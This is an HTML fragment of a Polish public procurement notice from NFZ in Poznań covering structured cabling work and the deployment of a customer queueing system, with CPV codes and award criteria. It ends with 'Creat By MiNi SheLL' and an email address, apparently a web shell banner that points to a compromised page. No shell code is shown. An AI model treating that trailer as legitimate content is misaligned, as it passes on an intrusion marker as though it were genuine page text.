f.	dokumentacją sieci okablowania strukturalnego, stanowiącą załącznik nr 6 do projektu umowy, zwierającą:
i.	projekt: adaptacja i modernizacja sieci okablowania strukturalnego z wydzielonym zasilaniem dedykowanym Strefy Obsługi Interesantów,
ii.	kosztorys ofertowy,
	oraz 
g.	wymaganiami wynikającymi z obowiązujących przepisów prawa oraz rzetelnej wiedzy technicznej, prawa budowlanego, wymagań bhp oraz przeciwpożarowych,
h.	wymaganiami wynikającymi z obowiązujących Polskich Norm i aprobat technicznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Skrócenie terminu zamówienia - maksymalnie o 20 dni - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA, INSTALACJA I WDROŻENIE SYSTEMU KOLEJKOWANIA INTERESANTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem umowy jest dostawa, instalacja i wdrożenie Systemu Kolejkowania Interesantów, zamiennie nazywanego Systemem, zgodnie z projektem technicznym, stanowiącym Załącznik nr 2 do umowy. 
2.	Przedmiot umowy określony w ust. 1 należy dostarczyć, zainstalować i uruchomić w siedzibie WOW NFZ przy ul. Grunwaldzkiej 158 w Poznaniu.
3.	Załącznik nr 2 do umowy obejmuje: Opis instalacji, Specyfikację techniczną oraz Przedmiar Systemu.
4.	W przypadku zastosowania przez Wykonawcę elementów równoważnych (zamienników) w instalacji Systemu, wymagane jest uzyskanie akceptacji Zamawiającego na dokonanie takich zmian oraz wykonanie na koszt Wykonawcy projektu uwzględniającego proponowane zmiany. 
5.	Wykonawca może złożyć ofertę równoważną. Zamawiający jako ofertę równoważną rozumie ofertę, w której zamiast wyświetlaczy stanowiskowych w technologii LED zaproponowane zostanie zastosowanie telewizorów LCD..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3, 45.31.11.00-1, 32.32.46.00-6, 32.42.00.00-3, 42.99.12.30-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Innowacyjność - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com